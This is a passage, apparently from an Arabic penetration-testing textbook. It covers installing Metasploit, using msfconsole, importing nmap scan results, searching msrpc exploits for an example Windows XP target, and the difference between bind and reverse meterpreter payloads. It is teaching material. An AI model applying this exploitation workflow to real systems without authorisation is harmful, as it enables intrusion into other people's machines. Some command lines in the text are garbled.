اﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻓﻧﻘوم ﺑﺗﺣﻣﯾل ﻧﺳﺧﺔ Metasploitاﻟﻣﺧﺻﺻﺔ ﻟﻠوﯾﻧدوز ﻣن اﻟﻣوﻗﻊ اﻟﺳﺎﺑﻖ ذﻛره ﺛم اﺗﺑﺎع اﻟﺧطوات
اﻟﺗﺎﻟﯾﺔ ﻹﺗﻣﺎم ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز.
-1ﺑﻌد اﻟﻘﯾﺎم ﺑﺗﺣﻣﯾل اﻹﺻدار اﻟﻣﺧﺻص ﻟﻧﺳﺦ اﻟوﯾﻧدوز ﻣن Metasploitﻧﻘوم ﺑﺈﻟﻐﺎء ﺗﻔﻌﯾل ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑرﻧﺎﻣﺞ ﻣﺿﺎد
اﻟﻔﯾروﺳﺎت.
-2ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ Installerاﻟذي ﻗﻣﻧﺎ ﺑﺗﺣﻣﯾﻠﮫ ﻣن ﻗﺑل ﺛم ﻧﺗﺑﻊ Wizardﻓﻲ ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺣﺗﻰ ﻧﺻل اﻟﻰ اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ:
إذا ﻟم ﺗﻘم ﺑﻌدم اﻟﻐﺎء ﺗﻔﻌﯾل ﻛل ﻣن ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑرﻧﺎﻣﺞ ﻣﺿﺎد اﻟﻔﯾروﺳﺎت ﻓﮭذا ﺳوف ﯾوﻗف ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت وﯾؤدى اﻟﻰ ظﮭور -3
رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﺎﻧﮫ ﯾﺟب اﻟﻐﺎء ﺗﻔﻌﯾل ﺟدار اﻟﺣﻣﺎﯾﺔ.
ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق Nextواﻟﺗﻲ ﺗذھب اﻟﻰ ﺷﺎﺷﮫ أﺧرى ﯾرﯾد ﻣﻧك ﻓﯾﮫ وﺿﻊ اﻟﻣﻧﻔذ اﻟذي ﺳوف ﯾﺳﺗﺧدﻣﮫ اﻟﺗطﺑﯾﻖ .ﻧدﺧل ﻣﻧﻔذ -4
SSLﻟﻛﻲ ﯾﺳﺗﺧدﻣﮫ ﺧدﻣﺔ Metasploitﺛم ﻧﻧﻘر ﻓوق .Nextاﻓﺗراﺿﯾﺎ ،ﯾﺳﺗﺧدم ﺧﺎدم اﺑﺎﺗﺷﻲ اﻟﻣﻧﻔذ 3790ل . HTTPSإذا ﻛﺎن
اﻟﻣﻧﻔذ ﻣﻧﺿم ﺑﺎﻟﻔﻌل إﻟﻰ ﻋﻣﻠﯾﺔ أﺧرى ،ﺗﺣدﯾد ﻣﺎ إذا ﻛﺎن ﻋﻣﻠﯾﺔ ﯾﺗم اﻻﺳﺗﻣﺎع ﻋﻠﻰ ھذا اﻟﻣﻧﻔذ وﻏﻠﻖ اﻟﻌﻣﻠﯾﺔ ،أو ﯾﻣﻛﻧك إدﺧﺎل ﻣﻧﻔذ
آﺧر ﻣن ھذا اﻟﻘﺑﯾل ﻛﻣﺎ 8080أو .442
ﻧﺗرك اﻹﻋدادات اﻻﻓﺗراﺿﯾﺔ ﻛﻣﺎ ھﻲ ﺛم ﻧﻘر ﻓوق Nextوﻋﻧد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻧﻧﻘر ﻓوق .Finish -5
ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل Metasploitوذﻟك ﻛﺎﻻﺗﻰ: -6
ﻓﻲ ھذه اﻟﺟزء ،ﺳوف ﻧدرس وﺣدة اﻟﺗﺣﻛم .(msfconsole) Metasploitﯾﺗم اﺳﺗﺧدام msfconsoleﻓﻲ اﻟﻣﻘﺎم اﻷول ﻹدارة ﻗﺎﻋدة ﺑﯾﺎﻧﺎت
،Metasploitوإدارة اﻟﺟﻠﺳﺎت ،وﺗﻛوﯾن وإطﻼق وﺣدات .Metasploitﻓﮭو أﺳﺎﺳﻲ ،ﻷﻏراض اﻻﺧﺗراق ،ﻓﺈن msfconsoleﯾﺣﺻل
ﻋﻠﻰ اﺗﺻﺎل إﻟﻰ اﻟﻣﺿﯾف اﻟﮭدف ﺑﺣﯾث ﯾﻣﻛﻧﮫ إطﻼق exploitاﻟﺧﺎص ﺿدھﺎ.
أﺳﮭل طرﯾﻘﺔ ﻟﻠوﺻول إﻟﻰ msfconsoleھو ﻣن ﺧﻼل ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وإدﺧﺎل اﻟﺳطر اﻟﺗﺎﻟﻲ:
#msfconsole
ﯾوﺟد طرﯾﻘﮫ أﺧرى ﻟﺗﺷﻐﯾل Metasploitﻓﻲ اﻟﺑﯾﺋﺔ اﻟرﺳوﻣﯾﺔ وذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ msfguiﻓﻲ اﻟﺗرﻣﻧﺎل.
ﻛﻣﺎ ﯾﻣﻛن اﻟوﺻول إﻟﻰ msfconsoleﻣن ﺧﻼل ﻗﺎﺋﻣﺔ اﻟﺗطﺑﯾﻘﺎت ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب .ﺑدء msfconsoleﯾﺳﺗﻐرق ﻣﺎ ﺑﯾن 10ﺛﺎﻧﯾﺔ و30
ﺛﺎﻧﯾﺔ ،ﻟذﻟك ﻻ داﻋﻲ ﻟﻠذﻋر إذا ﻟم ﯾﺣدث ﺷﻲء ﻟﺑﺿﻊ ﻟﺣظﺎت .ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ،ﺳوف ﺗﺑدأ Metasploitﻣن ﺧﻼل ﺗﻘدﯾم ﻟﻛم ﻣﻊ ﻻﻓﺗﺔ
ﺗرﺣﯾب وﻋﻼﻣﺔ اﻟﻣﺣث]> .[msfوھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻼﻓﺗﺎت Metasploitاﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﺗم ﻋرﺿﮭﺎ ﻋﺷواﺋﯾﺎ ،ﻟذﻟك ﻓﻣن اﻟطﺑﯾﻌﻲ إذا اﻟﺷﺎﺷﺔ
ﺗﺑدو ﻣﺧﺗﻠﻔﺔ ﻓﻲ ﻛل ﻣره .اﻟﺷﻲء اﻟﻣﮭم ھو أن ﺗﺣﺻل ﻋﻠﻰ ﻋﻼﻣﺔ اﻟﻣﺣث]>.[msf
اﻟﺷﺎﺷﺔ اﻷوﻟﯾﺔ ﻠﻠ Metasploitﺗظﮭر ﻛﺎﻻﺗﻰ:
ﻣن ﻓﺿﻠك ﻻﺣظ ،ﻋﻧد ﺗﺣﻣﯾل Metasploitﻷول ﻣره ،ﻓﺈﻧﮫ ﯾظﮭر ﻟك ﻋدد ،encoders ،payloads ،Exploitsو nopsاﻟﻣﺗﺎﺣﺔ .ﻛﻣﺎ
ﯾﻣﻛن أن ﺗظﮭر ﻟﻛم ﻛم ﯾوﻣﺎ ﻣر ﻣﻧذ آﺧر اﻟﺗﺣدﯾث .ﺑﺳﺑب اﻟﻧﻣو اﻟﺳرﯾﻊ ،Metasploitوﻧﺷﺎط اﻟﻣﺟﺗﻣﻊ واﻟﺗﻣوﯾل اﻟﻣﺎدي .ﻓﻣن اﻷھﻣﯾﺔ أن
ﺗﺣﺎﻓظ ﻋﻠﻰ Metasploitﻣﺣدث اﻟﻰ ﺗﺎرﯾﺦ اﻟﯾوم .وﯾﺗم إﻧﺟﺎز ھذا ﺑﺳﮭوﻟﺔ ﻋن طرﯾﻖ إدﺧﺎل اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل.
#msfupdate
اﻵن ﺑﻌد ان ﺗم ﺗﺣدﯾث ،Metasploitدﻋوﻧﺎ ﻧﺑدأ اﺳﺗﻛﺷﺎف رواﺋﻊ ھذه اﻷداة .ﻣن أﺟل اﺳﺗﺧدام ،Metasploitﯾﺟب ﺗﺣدﯾد اﻟﮭدف ،وﯾﺟب
اﺧﺗﯾﺎر ،exploitو payloadsاﻟﺗﻲ ﻧﺣﺗﺎﺟﮭﺎ وﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ،ﺛم ﯾﺟب ﺗﺷﻐﯾل .exploitﺳوف ﻧﺳﺗﻌرض اﻟﺗﻔﺎﺻﯾل ﻟﻛل ﺧطوة ﻣن
ھذه اﻟﺧطوات ﻓﻲ ﻟﺣظﺎت ﻗﻠﯾﻠﺔ ،وﻟﻛن ﻗﺑل ذﻟك ،دﻋوﻧﺎ ﻧﺳﺗﻌرض أﺳﺎﺳﯾﺎت ﻣﺻطﻠﺢ .Metasploitﻛﻣﺎ ذﻛر ﻓﻲ وﻗت ﺳﺎﺑﻖ ،اﻻﺳﺗﻐﻼل
) (exploitھو اﻟﺣﺻول ﻋﻠﻰ اﻷﻛواد اﻟﺟﺎھزة واﻟﺗﻲ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ ﻧظﺎم ﺑﻌﯾد .ھذه اﻷﻛواد ﯾﺳﺑب ﺑﻌض اﻟﺳﻠوك اﻟﻐﯾر طﺑﯾﻌﻲ ﻋﻠﻰ اﻟﻧظﺎم
اﻟﮭدف اﻟذي ﯾﺳﻣﺢ ﻟﻧﺎ ﻟﺗﻧﻔﯾذ .payloadsﻧذﻛر ﺑﺄن payloadsھو أﯾﺿﺎ ﻛﺗﻠﺔ ﺻﻐﯾرة ﻣن اﻷﻛواد اﻟﺗﻲ ﺗﺳﺗﺧدم ﻷداء ﺑﻌض اﻟﻣﮭﺎم ﻣﺛل ﺗﺛﺑﯾت
ﺑرﻧﺎﻣﺞ ﺟدﯾد ،وإﻧﺷﺎء ﻣﺳﺗﺧدﻣﯾن ﺟدد ،أو ﻓﺗﺢ backdoorﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف.
ﻧﻘﺎط اﻟﺿﻌف )(vulnerabilitiesھﻲ ﻧﻘﺎط اﻟﺿﻌف اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﺧﺗراق )(exploitاﻷﻧظﻣﺔ وﺗﻧﻔﯾذ اﻷﻛواد ﻋن ﺑﻌد )(payloads
ﻋﻠﻰ اﻟﮭدف Payloads .ھﻲ ﺑراﻣﺞ إﺿﺎﻓﯾﺔ أو وظﺎﺋف اﻟﺗﻲ ﻧدﯾرھﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻣرة واﺣدة ﻓﻲ اﺧﺗراق ﻗد ﻧﻔذ ﺑﻧﺟﺎح.
ﻣﻌظم اﻟﻘﺎدﻣﯾن اﻟﺟدد ﯾﺗﯾﮭون ﻓﻲ اﻟﻌدد اﻟﮭﺎﺋل ﻣن exploitوpayloads؛ ﻋﺎدة ﻣﺎ ﯾﺿﯾﻌون ﻓﻲ ﻣﺣﺎوﻟﺔ اﻟﻌﺛور ﻋﻠﻰ exploitاﻟﻣﻧﺎﺳﺑﺔ .اﻧﮭم
ﯾﻘﺿون وﻗﺗﮭم ﻓﻲ رﻣﻲ ﻛل exploitﺿد اﻟﮭدف ﺑطرﯾﻘﺔ ﻋﻣﯾﺎء ﻋﻠﻰ أﻣل أن ﯾﺣﺻل ﺷﯾﺋﺎ .ﻻﺣﻘﺎ ﻓﻲ ھذا اﻟﻔﺻل ،ﺳوف ﻧدرس أداة ﺗﻌﻣل ﺑﮭذه
اﻟطرﯾﻘﺔ وﻟﻛن اﻵن ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ أن ﻧﻛون أﻛﺛر ﻣن ذﻟك ﺑﻘﻠﯾل.
ﺑﻌض اﻷواﻣر اﻟﺷﺎﺋﻌﺔ اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ وﺣدة اﻟﺗﺣﻛم MSFCONSOLEھﻲ ﻛﺎﻻﺗﻰ:
]? :[help/ھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﺑﻌرض ﻣﻠﻔﺎت اﻟﻣﺳﺎﻋدة ﻟﻸواﻣر اﻟﺗﻲ ﺗﺣﺎول ﺗﺷﻐﯾﻠﮭﺎ.
] :[use moduleﯾﺳﻣﺢ ﻟك ھذا اﻷﻣر ﻟﺑدء اﻋداد اﻟوﺣدة ) (moduleاﻟذى ﺗﺧﺗﺎرھﺎ.
] :[set option_name moduleﯾﺳﻣﺢ ﻟك ھذا اﻷﻣر ﻟﺗﺣدﯾد اﻟﺧﯾﺎرات اﻟﻣﺧﺗﻠﻔﺔ ﻟوﺣدة ) (moduleاﻟﻣﺧﺗﺎرة.
] :[exploitھذا اﻻﻣر ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل وﺣدة اﻻﺧﺗراق ).(exploit module
] :[runھذا اﻻﻣر ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل اﻟوﺣدات اﻷﺧرى اﻟﻐﯾر ﻣﺧﺻﺻﮫ ﻟﻼﺧﺗراق ).(non-exploit module
] :[search moduleھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺑﺣث ﻋن وﺣدة ﻓردﯾﺔ.
] :[exitھذا اﻷﻣر ﯾﺳﻣﺢ ﻟك ﻟﻠﺧروج ﻣن .MSFCONSOLE
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ أواﻣر ،Metasploitﻓﺎن msfconsoleﺳوف ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗدﻋﺎء أواﻣر ﻧظﺎم اﻟﺗﺷﻐﯾل اﻷﺳﺎﺳﯾﺔ ﻣﺛل pingأو .nmapھذا
ﻣﻔﯾد ﻷﻧﮫ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟﺗﻧﻔﯾذ اﻟﻣﮭﺎم اﻟروﺗﯾﻧﯾﺔ دون أن ﺗﺗرك وﺣدة اﻟﺗﺣﻛم .ﻓﻲ أول ﺧطوة ﻧﺧطوھﺎ ،وﺳوف ﻧﺳﺗﺧدم nmapﻟﻔﺣص
اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ .اﻟﻧﺗﺎﺋﺞ ﯾﻣﻛن أن ﯾﺿﺎف ﺗﻠﻘﺎﺋﯾﺎ إﻟﻰ Metasploitﺑﺎﺳﺗﺧدام ﻣﻠف .XML
ﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﺳﺎﺑﻘﺎ ﺑدﻻ ﻣن رﻣﻲ ﻛل exploitﺿد اﻟﮭدف ﺑطرﯾﻘﺔ ﻋﻣﯾﺎء ،ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻹﯾﺟﺎد وﺳﯾﻠﺔ ﻹﯾﺟﺎد exploitاﻟﺟﺎھزة ﻓﻲ
Metasploitﻟﻣﻘﺎﺑﻠﺔ ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﻌروﻓﺔ ﻓﻲ اﻟﻧظﺎم اﻟﮭدف .ﻣن أﺟل رﺑط ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ اﻟﻧظﺎم اﻟﮭدف ﻣﻊ ،Metasploit exploit
ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻣراﺟﻌﺔ اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ ﺗوﺻﻠﻧﺎ إﻟﯾﮭﺎ ﻣن اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ ) (Scanningﺳﻧﺑدأ ھذه اﻟﻌﻣﻠﯾﺔ ﻣن ﺧﻼل اﻟﺗرﻛﯾز ﻋﻠﻰ ﺗﻘرﯾر Nessus
أو OpenVASاو " > ."nmap –script vuln <targetﺣﯾث ﻧذﻛر ﺑﺄن ھؤﻻء ﯾﺳﺗﺧدﻣوا ﻟﻔﺣص ﻧﻘﺎط اﻟﺿﻌف وﯾوﻓر ﻟﻧﺎ ﻗﺎﺋﻣﺔ ﻣن
ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﻌروﻓﺔ أو اﻟﺑﺎﺗش اﻟﻣﻔﻘودة .ﻋﻧد اﺳﺗﻌراض إﺧراج Nessusاو ،OpenVASﯾﺟب ﻋﻠﯾك اﻟﺗﺄﻛد ﻣن اﻟﻣﻼﺣظﺎت وﻟﻛن
اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ وﺻﻔت ﺑﺄﻧﮭﺎ "ﻋﺎﻟﯾﺔ" أو "ﺑﺎﻟﻎ اﻷھﻣﯾﺔ" ﯾﺟب ان ﯾﻛون ﻟﮭﺎ اھﺗﻣﺎم ﺧﺎص .اﻟﮭدف ﻣن ھذه اﻟﻣرﺣﻠﺔ ھو ﺗﺧﺻﯾص exploitﻟﻧﻘﺎط
اﻟﺿﻌف اﻟﻣﺣددة ﻓﻲ اﻟﻧظﺎم اﻟﮭدف.
ﻧﻔﺗرض أن ﻟدﯾك ھدﻓﺎ ﺟدﯾدا ﻣﻊ ﻋﻧوان .[192.168.1.104] IPﻣﻊ ﺗﺷﻐﯾل Nmapﯾﺧﺑرك ان ھذا اﻟﮭدف اﻟﺟدﯾد ھو آﻟﺔ ذات ﻧظﺎم ﺗﺷﻐﯾل
وﯾﻧدوز XP Service pack 3وﺟدار ﺣﻣﺎﯾﺔ ﻏﯾر ﻣﻔﻌل .ﻧﺳﺗﻣر ﻓﻲ اﻟﺧطوة ،2ﺣﯾث ﯾﻣﻛن ﺗﺷﻐﯾل Nessusاو OpenVASاو nmap
ﻋﻠﻰ اﻟﮭدف وذﻟك ﻹﻋطﺎﺋك ﺗﻘرﯾر ﻋن ﻧﻘﺎط اﻟﺿﻌف.
-1ﺳوف ﻧﻘوم ﺑﺗﺷﻐﯾل ﺑرﻧﺎﻣﺞ Nmapﻋﻠﻰ ھذا اﻟﮭدف ﺑﺎﺳﺗﺧدام msfconsoleﻹﻋطﺎء ﺗﻘرﯾر ﻋن اﻟﺧدﻣﺎت ﻋن اﻟﮭدف ﻛﺎﻻﺗﻰ:
-2ھﻧﺎ ﻗﻣﻧﺎ ﺑﻔﺣص اﻟﻧظﺎم اﻟﮭدف ﺛم ﺣﻔظﻧﺎ ﻧﺎﺗﺞ اﻟﻔﺣص ﻓﻲ ﻣﻠف xmlﺑﺎﺳم my.xmlوذﻟك ﺑﺎﺳﺗﺧدام اﻟﺗﻌﺑﯾر .–oX
-3ﺳﻧﻘوم ﺑﺎﺳﺗﯾراد ھذه اﻟﻧﺗﺎﺋﺞ ﻣن nmapاﻟﻰ Metasploitﺑﺎﺳﺗﺧدام ﻣﻠف xmlاﻟذي أﻧﺷﺄﻧﺎه .وﻧﺣن ﻧﻔﻌل ذﻟك ﻣن ﺧﻼل إﺻدار
اﻷواﻣر اﻟﺗﺎﻟﯾﺔ:
-4ﻧﻼﺣظ وﺟود ﻣﺷﻛﻠﮫ وھﻲ ان ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ﻏﯾر ﻣﺗﺻﻠﺔ وﻹﺛﺑﺎت ذﻟك ﻧﻛﺗب اﻻﻣر اﻟﺗﺎﻟﻲ:
ﻣﻠﺣوظﮫ :إذا ﻛﻧت ﺗرﻏب ﻓﻲ ﺑدء ﺧدﻣﺗﻲ postgresqlو Metasploitﺑطرﯾﻘﮫ اﻟﯾﮫ ﻋﻧد إﻋﺎدة اﻟﺗﺷﻐﯾل ﻓﺳوف ﺗﺣﺗﺎج إﻟﻰ اﺳﺗﺧدام
.update-rc.d
#update-rc.d©postgresql©enable
#update-rc.d©metasploit©enable
-8ﻧﻘوم ﺑﻔﺣص ﺳرﯾﻊ ﻟﻸﻣر hostsواﻟذي ﯾدل ﻋﻠﻰ أن ﻋﻣﻠﯾﺔ اﻻﺳﺗﯾراد ﻟدﯾﻧﺎ ﻧﺎﺟﺣﺔ .اﻻن و Metasploitﻟدﯾﮫ ﺑﯾﺎﻧﺎت .nmap
-9ﻟرؤﯾﺔ اﻟﺧدﻣﺎت اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﻧظﺎم اﻟﮭدف ﻓﻲ metasploitﯾﻣﻛﻧك ذﻟك ﺑﺎﺳﺗﺧدام اﻻﻣر servicesﻛﺎﻻﺗﻰ:
-10ﯾﻣﻛﻧك ﻋﻣل اﻟﺧطوﺗﯾن اﻟﺳﺎﺑﻘﺗﯾن وھو اﻟﻔﺣص ﺑﺑرﻧﺎﻣﺞ nmapوإدﺧﺎل ﻧﺎﺗﺞ اﻻﻣر اﻟﻰ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت metasploitﻛﺎﻻﺗﻰ:
-11ﺛم ﯾﻣﻛﻧك اﻟﺗﺣﻘﻖ ﻣن أن Metasploitﻟدﯾﮫ اﻟﻣﻌﻠوﻣﺎت ذات اﻟﺻﻠﺔ ﺑﻘﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ﺑﮫ ﺑﺎﺳﺗﺧدام اﻻﻣرﯾن hosts
و servicesﻛﺎﻻﺗﻰ:
-12ﯾﻛﺷف اﻷﻣر servicesﻣﺛﻼ ان اﻟﻧظﺎم اﻟﮭدف ﯾﺳﺗﺧدم اﻟﺧدﻣﺔ .msrpcدﻋوﻧﺎ ﻧرى ﻣﺎ إذا ﻛﻧﺎ ﻧﺳﺗطﯾﻊ اﻟﺑﺣث ﻋن exploitﺗﺧص
ھذا واﻻﺳﺗﻔﺎدة ﻣن ذﻟك .ﻣن اﻟﻣﮭم أن ﻧﻼﺣظ أﻧﮫ ﻋﻧد ﻣﮭﺎﺟﻣﺔ ﺧﺎدم اﻟوﯾب اﻟﺣﻘﯾﻘﻲ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﻓﻧﺣن ﻻ ﻧﺣﺗﺎج ﺑﺎﻟﺿرورة إﻟﻰ
ﻣﺣﺎوﻟﺔ اﺳﺗﻐﻼل ﻧﻘطﺔ ﺿﻌف ﺷﺑﻛﺔ اﻹﻧﺗرﻧت .ﺣﯾث ان اﻟﻣﮭﺎﺟم اﻟﺣﻘﯾﻘﻲ ﯾﺳﺗﻔﯾد ﻣن ﺟﻣﯾﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺧﺎدم اﻟوﯾب
ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت.
-13ﻧﺳﺗﺧدم اﻻﻣر searchﻟﻧرى اﻟﻌدﯾد ﻣن exploitاﻟﻣﺗﺎﺣﺔ اﻟﺧﺎﺻﺔ ب .msrpcﻟﻧﺟد ان ﻟدﯾﮭم أﯾﺿﺎ ﺗﺻﻧﯾف .ﯾﻔﺿل اﺳﺗﺧدام
ﺻﺎﺣب اﻟﺗﺻﻧﯾف .excellentﻟﻠﻣزﯾد ﻣن اﻟﻣﻌرف ﺣول ھذه اﻟوﺣدات ﻣن ﺧﻼل ﻣوﻗﻊ اﻟوﯾب اﻟﺗﺎﻟﻲ:
http://www.metasploit.com/modules/exploit/
-15ﺑﻣﺟرد ﺗﺣدﯾد ،exploitﻓﻧﺣن ﺑﺣﺎﺟﺔ اﻟﻰ ان ﻧرى ﻣﺎ ھﻲ اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ ﻗﺑل أن ﻧﺗﻣﻛن ﻣن ﺗﻧﻔﯾذ اﺧﺗﯾﺎرﻧﺎ .وﻧﺣن ﻧﻔﻌل ذﻟك
ﻋن طرﯾﻖ ﺗﺣدﯾد اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ اﻟﻣدرﺟﺔ ﻓﻲ اﻹﺧراج واﺧﺗﯾﺎر payloadsاﻟﺗﻲ ﻧرﯾد ﺗﺳﻠﯾﻣﮭﺎ .ﻧﺻدر اﻷﻣر show options
ﻟﻌرض اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ:
-16ﯾﻣﻛﻧﻧﺎ أن ﻧرى ﻣن ھذا اﻟﻣﺛﺎل أﻧﻧﺎ ﺑﺣﺎﺟﺔ إﻟﻰ إدﺧﺎل ﺑﯾﺎﻧﺎت RHOST. RHOSTھو ﻋﻧوان IPﻟﻠﻣﺿﯾف اﻟﺑﻌﯾد اﻟﮭدف .وﻧﺣن
ﺑﺣﺎﺟﺔ أﯾﺿﺎ ﻟﺗﺣدﯾد اﻟﺣﻣوﻟﺔ payloadsووﺿﻊ ﺧﯾﺎرات .payloadsرﺑﻣﺎ ﯾﻛون ھﻧﺎك اﻟﻌدﯾد ﻣن payloadsﻣﺗﻌددة ﻟﻼﺧﺗﯾﺎر
ﻣن ﺑﯾﻧﮭﺎ .ﻟﻣﻌرﻓﺔ payloadsاﻟﻣﺗﺎﺣﺔ ،إﺻدار اﻷﻣر .show payloads
-17ﺑﻣﺟرد رؤﯾﺔ Payloadsاﻟﺗﻲ ﺗرﯾدھﺎ ﻓﺳوف ﺗﺣﺗﺎج اﻟﻰ إدراج payloadsﻻﺳﺗﺧداﻣﮫ ﻋن طرﯾﻖ اﺻدار اﻻﻣر .set PAYLOAD
ﯾوﺟد اﻟﻌدﯾد ﻣن ھذه payloadsﻧﻔﺳﮭﺎ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻻﺧرى ﻟﯾﻧﻛس ،OS X ،BSD ،وﻏﯾرھﺎ ﻣن أﻧظﻣﺔ اﻟﺗﺷﻐﯾل .ﻣرة أﺧرى ،ﯾﻣﻛﻧك
اﻟﻌﺛور ﻋﻠﻰ اﻟﺗﻔﺎﺻﯾل اﻟﻛﺎﻣﻠﺔ ﻣن ﺧﻼل ﻣراﺟﻌﺔ اﻟوﺛﺎﺋﻖ Metasploitﻋن ﻛﺛب .ھﻧﺎك ﺷﻲء اﺧر ﯾﺳﺑب اﻻرﺗﺑﺎك ﻟﻛﺛﯾر ﻣن اﻟﻧﺎس ھو اﻟﻔرق
ﺑﯾن payloadsﻣﻣﺎﺛﻠﺔ ﻣﺛل ] [windows/meterpreter/bind_tcpو ][windows/meterpreter/reverse_tcp
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
304
اﻟﻔرق اﻟرﺋﯾﺳﻲ ﺑﯾن ھذﯾن ھو اﺗﺟﺎه اﻻﺗﺻﺎل ﺑﻌد اﺧﺗراق اﻟﻧظﺎم اﻟﮭدف.
-ﻓﻲ ،bind payloadﻧﺣن ﻓﻲ وﻗت واﺣد ﻧﻘوم ﺑﺈرﺳﺎل exploitوإﺟراء
اﺗﺻﺎل إﻟﻰ اﻟﮭدف ﻣن اﻟﺟﮭﺎز .ﻓﻲ ھذا اﻟﻣﺛﺎل ،اﻟﻣﮭﺎﺟم ﯾرﺳل exploit
ﻟﻠﮭدف واﻟﮭدف ﯾﻧﺗظر اﻻﺗﺻﺎل ان ﯾﺄﺗﻲ اﻟﯾﮫ ﺑﻌد إرﺳﺎل ،exploitوآﻟﺔ
اﻟﻣﮭﺎﺟم ﺗرﺗﺑط ﺑﺎﻟﮭدف.
-ﻓﻲ ،reverse payloadآﻟﺔ اﻟﻣﮭﺎﺟم ﺗرﺳل exploitوﻟﻛن ﯾﻔرض ﻋﻠﻰ
اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف اﻻﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﮭﺎﺟم .ﻓﻲ ھذا اﻟﻧوع ﻣن
اﻟﮭﺟوم ،ﺑدﻻ ﻣن اﻻﻧﺗظﺎر ﻋن اﺗﺻﺎل وارد ﻋﻠﻰ ﻣﻧﻔذ ﻣﺣدد أو ﺧدﻣﺔ ،ﻓﺎن
اﻟﺟﮭﺎز اﻟﮭدف ﯾﺟﻌل اﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﮭﺎﺟم.
اﺧر ﻣوﺿوع ﻋن Metasploitﺣﯾث ﺳوف ﻧﺗطرق ﻟﻣﻧﺎﻗﺷﺔ Metasploitﺑﺎﻟﻛﺎﻣل ﻻﺣﻘﺎ ھو Meterpreter . Meterpreterاو
Meta-Interpreterھﻲ أداة ﻗوﯾﺔ وﻣرﻧﺔ اﻟﺗﻲ ﺳوف ﺗﺣﺗﺎج ﺗﻌﻠﻣﮭﺎ إذا ﻛﻧت ﺗرﯾد إﺗﻘﺎن ﻓن ،Meterpreter . Metasploitھﻲ
payloadﻣﺗﺎﺣﺔ ﻓﻲ Metasploitاﻟذي ﯾﻌطﻲ اﻟﻣﮭﺎﺟﻣﯾن ﻗذﯾﻔﺔ اﻟﻘﯾﺎدة اﻟﻘوﯾﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﻔﺎﻋل ﻣﻊ ھدﻓﮭم .آﺧر ﻣﯾزة ﻛﺑﯾرة ﻟل
